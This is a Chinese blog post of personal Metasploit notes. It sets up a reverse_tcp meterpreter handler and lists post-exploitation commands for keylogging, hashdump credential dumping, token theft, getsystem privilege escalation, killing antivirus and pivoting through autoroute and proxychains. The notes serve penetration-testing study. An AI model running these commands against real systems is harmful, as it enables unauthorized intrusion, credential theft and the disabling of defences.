首页 > 其他分享 >msf使用记录

msf使用记录

时间:2022-11-20 21:55:15浏览次数:70  
标签:multi exe run 记录 handler 使用 msf meterpreter

使用记录

参考资料
https://xz.aliyun.com/t/3007

得到会话,上传文件
    upload /root/360rd.exe  c:/ProgramData  	  大小写	# 上传文件到目标机上
执行exe
    execute 			#在目标机中执行文件
    execute -H -f cmd.exe 		# 创建新进程cmd.exe,-H不可见,-i交互
全局代理
set Proxies socks5:8.8.8.8:8787
建立监听
1 使用handler模块
msf > use exploit/multi/handler

2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)

PAYLOAD =>php/meterpreter/reverse_tcp

3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.88.155
LHOST =>192.168.88.155

4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 4444
LPORT => 4444

5 发动攻击
msfexploit(multi/handler) > exploit
Meterpreter后攻击
meterpreter > background  放回后台
meterpreter > exit  关闭会话
meterpreter > help  帮助信息
meterpreter > Sysinfo系统平台信息
meterpreter > screenshot  屏幕截取
meterpreter > shell  命令行shell (exit退出)
meterpreter > getlwd  查看本地目录
meterpreter > lcd  切换本地目录
meterpreter > getwd  查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd  切换目录 
meterpreter > rm  删除文件 
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe  上传文件
meterpreter > search -d c:  -f *.doc  搜索文件
meterpreter > execute -f  cmd.exe -i   执行程序/命令 
meterpreter > ps  查看进程
meterpreter > run post/windows/capture/keylog_recorder   键盘记录
meterpreter > getuid  查看当前用户权限
meterpreter > use priv  加载特权模块
meterpreter > getsystem  提升到SYSTEM权限
meterpreter > hashdump  导出密码散列
meterpreter > ps   查看高权限用户PID
meterpreter > steal_token <PID>  窃取令牌
meterpreter > rev2self  恢复原来的令牌 
meterpreter > migrate pid  迁移进程
meterpreter > run killav  关闭杀毒软件 
meterpreter > run getgui-e  启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP>  端口转发
meterpreter > run get_local_subnets  获取内网网段信息
meterpreter > run autoroute -s <内网网段>  创建自动路由
meterpreter > run autoroute -p  查看自动路由表
创建代理通道:
msf > use auxiliary/server/socks4a   设置socks4代理模块
msf auxiliary(socks4a) > show options 
msf auxiliary(socks4a) > run
配置proxychains参数:
nano /etc/proxychains.conf   修改代理监听端口,和前面端口一致
quite_mode  设置成安静模式:去掉如下参数前面的注释

标签:multi,exe,run,记录,handler,使用,msf,meterpreter
From: https://www.cnblogs.com/startstart/p/16909705.html

相关文章

  • WordPress 特色封面图像开启与使用
    wordpress特色图像可以用于分类页面或者网站首页调用文章缩略图时,指定调用某张图片,实现自定义封面的效果。WORDPRESS程序默认是不支持特色图像功能,所以我们需要开启特色图......
  • BurpSuite使用指南-使用Burp Spider
    使用BurpSpider存在于BurpTarget中的站点信息,我们可以直接传送到BurpSpider中进行站点信息的爬取新版本是没有单独的spider功能新建一个扫描任务输入扫描的网址选择快速......
  • Linux 使用 iptables 禁止某些 IP 访问
    在Linux服务器被攻击的时候,有的时候会有几个主力IP。如果能拒绝掉这几个IP的攻击的话,会大大减轻服务器的压力,说不定服务器就能恢复正常了。在Linux下封停IP,有封杀网段和封......
  • 标志枚举的使用
    标志枚举的使用大多是在标记多重状态,比如说文件的属性:只读,可写,隐藏,系统文件等相关属性,都对应相应的标志位,如果在C#中想实现自己的标志枚举,也是可以的,下文是亲身试验的一段代......
  • C#单例模式的简单使用
    单例模式示例:publicsealedclassWindowService{//定义一个私有的静态全局变量来保存该类的唯一实例privatestaticWindowServiceService;//定义一个只读静......
  • RV-LINK:Eclipse 使用 RV-LINK 调试 RISC-V 程序
    RV-LINK项目主页:​​https://gitee.com/zoomdy/RV-LINK​​​最新的文档请访问:​​https://gitee.com/zoomdy/RV-LINK/wikis​​,这里的内容可能没有及时更新。前期准备按......
  • 为仿真器添加eCos多线程调试支持,GDBServer Extender 0.0.1 使用说明
    可以使用RedBoot或者仿真器调试eCos系统,RedBoot集成的GDBStubs已经支持eCos的多线程调试,使用GDB命令infothreads就可以读取当前的线程状态。但是使用仿真器时,由于仿真器不......
  • 获取eCos堆栈使用情况
    在嵌入式系统中,堆栈是静态分配的,不会依据堆栈的使用情况自动增加堆栈深度,存在堆栈溢出的风险。一旦发生堆栈溢出,后果很严重,可能会立即导致死机,也可能埋了一颗定时炸弹,在随后......
  • 考研记录Week26【11.14~11.20】
    一、本周总结:使用时间:总计14h21min,政治8h10min,英语6h11min.完成任务:英语:1.真题复习政治:1.肖秀荣8套卷完成7套卷二、下周规划:数学:1.【高数强化】高数辅导讲义+【线代强化......
  • 22.11.20 ICPC合肥站 打星记录
       A,B,H签到。B题:注意区分相对误差与绝对误差!!小数相对误差小于1e-6,至少要输出十二位!G题优先队列。场上十几分钟就想出来了,表扬自己一波,留个坑位写题解。M题情况......